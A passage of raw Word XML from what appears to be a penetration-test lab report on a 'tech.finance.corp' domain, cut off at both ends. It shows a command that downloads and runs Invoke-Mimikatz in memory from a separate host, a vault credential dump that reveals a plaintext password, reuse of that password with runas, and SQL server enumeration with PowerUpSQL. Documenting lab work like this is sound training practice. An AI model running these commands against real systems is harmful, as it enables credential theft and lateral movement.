    </w:p>
    <w:p w14:paraId="3EFCE753" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F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EA027A" wp14:editId="5B6E07D7">
            <wp:extent cx="5943600" cy="28943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2C9A" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F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72FB752" wp14:editId="082BE07C">
            <wp:extent cx="5943009" cy="2600041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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="26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D46E" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F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4750A65" wp14:editId="091CA3C7">
            <wp:extent cx="5943600" cy="2894618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5A8C" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F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fter that I download the Invoke-Mimikatz.ps1 script in the memory with the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA9DDB" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (New-Object Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(‘http://172.16.99.11:8000/Invoke-Mimikatz.ps1’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E68ABD" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="007C298E" w:rsidP="00A87F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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C3D007" wp14:editId="35106201">
            <wp:extent cx="5943600" cy="2894618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46A2" w14:textId="77777777" w:rsidR="007C298E" w:rsidRDefault="007C298E" w:rsidP="007C29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5383C1" w14:textId="77777777" w:rsidR="007C298E" w:rsidRDefault="007C298E" w:rsidP="007C29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F240DC" w14:textId="77777777" w:rsidR="007C298E" w:rsidRDefault="007C298E" w:rsidP="007C29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8505CE" w14:textId="4B217CDE" w:rsidR="00E408CB" w:rsidRPr="00E408CB" w:rsidRDefault="00E408CB" w:rsidP="00E408CB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46477323"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E40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Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E40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24"/>
    </w:p>
    <w:p w14:paraId="3547CF95" w14:textId="77777777" w:rsidR="00E408CB" w:rsidRDefault="00E408CB" w:rsidP="007C29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AEDECF" w14:textId="3DF9DAB3" w:rsidR="007C298E" w:rsidRDefault="007C298E" w:rsidP="007C298E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">After download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C298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C298E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7C298E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C298E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r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>techsrv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> box and tried dumping creds from vault using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A68F75" w14:textId="77777777" w:rsidR="007C298E" w:rsidRDefault="007C298E" w:rsidP="007C298E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke-Mimikatz -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Command  </w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>token::elevate</w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vault::cred /patch</w:t>
      </w:r>
      <w:r w:rsidRPr="007C298E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA3055" w14:textId="77777777" w:rsidR="007C298E" w:rsidRDefault="007C298E" w:rsidP="007C298E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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8C8273" wp14:editId="3975578F">
            <wp:extent cx="5943600" cy="2894618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E287" w14:textId="3687AEBD" w:rsidR="007C298E" w:rsidRPr="00BE0CB1" w:rsidRDefault="00282DB8" w:rsidP="007C29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E0CB1" w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00BE0CB1" w:rsidRPr="00BE0CB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BE0CB1" w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidR="00BE0CB1" w:rsidRPr="00BE0CB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E0CB1" w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>creds</w:t>
      </w:r>
      <w:r w:rsidR="00BE0CB1" w:rsidRPr="00BE0CB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E0CB1" w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00BE0CB1" w:rsidRPr="00BE0CB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E0CB1" w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00BE0CB1" w:rsidRPr="00BE0CB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E0CB1" w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>databaseagent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B30FA" w14:textId="77777777" w:rsidR="00BE0CB1" w:rsidRDefault="00BE0CB1" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="95" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I used these credentials to open a powershell session as databaseagent user, by using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62E228" w14:textId="77777777" w:rsidR="00BE0CB1" w:rsidRDefault="00BE0CB1" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r w:rsidRPr="00BE0CB1">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:b/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00BE0CB1">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:b/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>user:databaseagent@tech.finance.corp</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“powershell.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8ACB68" w14:textId="77777777" w:rsidR="00BE0CB1" w:rsidRDefault="00BE0CB1" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AA3B6F" w14:textId="77777777" w:rsidR="00BE0CB1" w:rsidRDefault="00BE0CB1" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="138"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">When prompted for password I entered: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">“CheckforSQLServer31-Availability” </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>as found in the mimikatz output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6E770" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="138"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB6E551" w14:textId="728F12F3" w:rsidR="00BE0CB1" w:rsidRDefault="00BE0CB1" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="13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ACE45C" wp14:editId="56C58513">
            <wp:extent cx="5943009" cy="2642082"/>
            <wp:effectExtent l="0" t="0" r="63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5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="264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85F2F" w14:textId="3D0CDD6C" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00E408CB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46477324"/>
      <w:r w:rsidRPr="00E40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umerating SQLServer:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="31974D0E" w14:textId="77777777" w:rsidR="00E408CB" w:rsidRPr="00E408CB" w:rsidRDefault="00E408CB" w:rsidP="00E408CB"/>
    <w:p w14:paraId="52B7E37D" w14:textId="3FC3F76B" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="13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282D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After </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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manually</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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82DB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enumerating,</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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 started enumerating </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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the</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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QL servers in the domain and </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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checking</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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f the current user </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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had</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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82DB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permission</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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o connect to any of them. </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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For</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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82DB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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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282DB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purpose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00282D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82DB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we</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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an use </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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the</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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82DB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PowerUpSQL.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00282D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82DB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script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8481BE" w14:textId="3BC173E0" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.\PowerupSQL.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E18C4D7" w14:textId="337EBFEE" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-SQLInstanceDomain | Get-SQLServerinfo -</w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095DADD" w14:textId="2FFA1C1D" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8"/>
    <w:p w14:paraId="2915577C" w14:textId="00C62415" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F0640D1" wp14:editId="0CA0B3B0">
            <wp:extent cx="5943009" cy="2610551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4"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="261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2FB6A" w14:textId="77777777" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8"/>
    <w:p w14:paraId="4C2D25F3" w14:textId="7C23EB26" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="151"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> I found out that I can connect to </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">dbserver31 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, t</w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hen</w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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82DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>verified</w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB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82DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">accessibility </w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09010998" w14:textId="4D014B24" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="151"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -</w:t>
      </w:r>
      <w:r w:rsidRPr="00282DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC8E7A" w14:textId="12E845C7" w:rsidR="00282DB8" w:rsidRDefault="00C53AEC" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="151"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BCF5239" wp14:editId="7B4CCC06">
